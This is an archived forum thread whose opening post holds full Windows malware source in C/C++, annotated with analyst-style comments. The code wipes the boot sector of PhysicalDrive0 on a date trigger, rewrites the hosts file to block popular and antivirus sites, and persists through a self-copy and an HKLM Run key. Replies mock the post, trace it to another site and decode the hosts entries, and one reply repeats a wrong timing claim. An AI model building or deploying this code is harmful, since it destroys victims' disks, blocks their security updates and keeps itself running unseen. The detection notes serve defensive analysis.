Programming and Scripting => Beginner's Corner => : Jeirox January 03, 2015, 10:55:50 PM
-
#include <Windows.h>
// Analyst note: time-triggered destructive payload. WinMain spawns this on a
// fresh thread every loop iteration, so the check repeats for the life of the
// process.
// Behaviour as written: when the local calendar year is 2014, open the raw
// device PhysicalDrive0 with GENERIC_ALL, write 512 zero bytes at the current
// file pointer (offset 0 on a freshly opened handle, i.e. the boot sector),
// close the handle and force a reboot via ExitWindowsEx.
// No return value is checked, so every failure (no elevation, no
// SE_SHUTDOWN_NAME privilege, invalid handle) is silent.
// Detection/mitigation: a raw write to \\.\PhysicalDrive* by a user-mode
// process, followed by ExitWindowsEx(EWX_REBOOT), is a high-signal event
// pair; raw disk access normally requires an elevated token, so least
// privilege blocks the write and leaves only the reboot attempt.
DWORD WINAPI CheckTime(){
DWORD write;                 // bytes-written out-param; never inspected
SYSTEMTIME st;
char data[512];              // one sector's worth of zeros
ZeroMemory(&data,sizeof(data));
GetLocalTime(&st);a          // trailing "a" looks like paste damage in the post
if(st.wYear==2014){          // trigger condition: local year only
// handle is not compared against INVALID_HANDLE_VALUE before use
HANDLE disk=CreateFile("\\.\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
WriteFile(disk,data,512,&write,NULL);   // zeroes sector 0 of the drive
CloseHandle(disk);
ExitWindowsEx(EWX_REBOOT,0); // reboot needs SE_SHUTDOWN_NAME, enabled in WinMain
}
return 0;
}
// Analyst note: hosts-file tampering. The byte array below is plain ASCII
// (decoded further down this thread): several popular sites and two AV-vendor
// domains, each mapped to 127.0.0.1. The file is opened with CREATE_ALWAYS,
// so the existing hosts file is truncated and replaced rather than appended.
// Path is built from %windir% with an unchecked strcat into a 60-byte buffer;
// the result of GetEnvironmentVariable, CreateFile and WriteFile is ignored.
// Detection/mitigation: writes to system32\drivers\etc\hosts by a non-installer
// process, and hosts entries pointing vendor/update domains at loopback, are
// worth alerting on; remediation is restoring the hosts file from a known-good
// copy. Writing there needs an elevated token.
DWORD WINAPI hosts(){
// ASCII hosts-file text as raw bytes (CRLF-separated lines)
char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
char path[60];               // %windir% + suffix; no length check before strcat
DWORD write;                 // bytes-written out-param; never inspected
GetEnvironmentVariable("windir",path,sizeof(path));
strcat(path,"\system32\drivers\etc\hosts");
// CREATE_ALWAYS: any existing hosts file is truncated, not appended to
HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
WriteFile(hFile,data,sizeof(data),&write,NULL);
CloseHandle(hFile);
return 0;
}
// Analyst note: persistence. Every 10 seconds (Sleep takes milliseconds) the
// loop re-creates the value "Virus" under the HKLM Run key, pointing at the
// hard-coded name "Virus.exe" rather than the copied file's full path.
// RegSetValueEx is given cbData=60 although sizeof(value) is 10, so 50 bytes
// of adjacent stack are copied into the registry value after the string --
// the stored data will carry trailing garbage, which is itself a useful
// artifact when triaging the key. The loop never exits; "return 0" is dead.
// Detection/mitigation: any write to HKLM\...\CurrentVersion\Run by an
// unsigned binary is an autostart IoC; the rewrite-every-10s pattern also
// defeats a one-off manual deletion while the process is alive, so kill the
// process first, then remove the value. Writing HKLM requires elevation.
DWORD WINAPI reg(){
char value[]="Virus.exe";    // 10 bytes including the terminator
HKEY hKey;
while(1){                    // infinite re-arm loop
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",&hKey);
RegSetValueEx(hKey,"Virus",0,REG_SZ,(LPBYTE)value,60);   // cbData 60 > sizeof(value)
RegCloseKey(hKey);
Sleep(10000);                // 10 000 ms = 10 s
}
return 0;                    // unreachable
}
// Analyst note: entry point; orchestrates the three payloads above.
// Sequence: enable SE_SHUTDOWN_NAME on the process token (needed for the
// ExitWindowsEx call in CheckTime), copy the running executable to
// %windir%\Virus.exe (CopyFile with bFailIfExists=false overwrites any
// existing file), start the registry and hosts threads once, then spawn a
// new CheckTime thread every 10 seconds forever.
// Nothing is checked: LookupPrivilegeValue, OpenProcessToken,
// AdjustTokenPrivileges, CopyFile and CreateThread results are all dropped;
// hToken and every CreateThread handle are never closed, so the process leaks
// one thread handle per loop iteration. hPrev, cmd and show are unused.
// "false" is used as a literal, so this listing presumably builds as C++.
// Detection/mitigation: a process copying itself into %windir%, enabling the
// shutdown privilege and then writing the Run key is a compact behavioural
// signature; without an elevated token the copy, the Run-key write and the
// raw-disk write all fail, leaving only the hosts-file and reboot attempts.
int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
char file[MAX_PATH];         // own executable path
char path[60];               // %windir% + "\Virus.exe"; no length check before strcat
HANDLE hToken;               // never closed
LUID luid;
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
TOKEN_PRIVILEGES tp;
tp.Privileges[0].Luid=luid;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp.PrivilegeCount=1;
OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);   // enables shutdown privilege
GetModuleFileName(NULL,file,sizeof(file));
GetEnvironmentVariable("windir",path,60);
strcat(path,"\Virus.exe");
CopyFile(file,path,false);   // self-copy; overwrites if the target exists
// function pointers cast to LPTHREAD_START_ROUTINE; returned handles are leaked
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
while(1){                    // re-check the trigger date every 10 s
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
Sleep(10000);
}
return 0;                    // unreachable
}
}
-
At which line does it overwrite the MBR? Because all I see it doing is touch the registry and write some data into the hosts file, kek. Also post where you copied this garbage from; more info is needed.
I give you a day before it's removed.
-
I see some resemblance of code in:
http://www.rohitab.com/discuss/topic/39459-my-c-virus/ (http://www.rohitab.com/discuss/topic/39459-my-c-virus/) :-X :-X :-X
-
Yeah it's the same code... shame on OP for not mentioning where he copied it from.
-
for the curious/lazy it writes out:
www.youtube.com 127.0.0.1
www.google.com 127.0.0.1
www.yahoo.com 127.0.0.1
www.facebook.com 127.0.0.1
www.microsoft.com 127.0.0.1
www.eset.com 127.0.0.1
www.eset.eu 127.0.0.1
en.wikipedia.org 127.0.0.1
which means that, as a whole, this code overwrites the hosts entries of a few popular sites to point at localhost, sets up a registry Run key to autostart (with a hard-coded file name instead of grabbing its own path), and checks whether the current year is 2014; if so, it attempts to overwrite .\PhysicalDrive0 with zeroed memory. It waits 10,000 seconds before checking the time again.
-
for the curious/lazy it writes out:
www.youtube.com 127.0.0.1
www.google.com 127.0.0.1
www.yahoo.com 127.0.0.1
www.facebook.com 127.0.0.1
www.microsoft.com 127.0.0.1
www.eset.com 127.0.0.1
www.eset.eu 127.0.0.1
en.wikipedia.org 127.0.0.1
which means as a whole this code overwrites the host entries of a few popular sites to localhost, sets up a regkey to autostart(with hardcoded file name, instead of grabbing its own), and checks if the current year is 2014, if so attempts to overwrite .\PhysicalDrive0 with zeroed memory. Waits 10,000 seconds before checking the time again.
LOL pwned.
Thanks madf0x.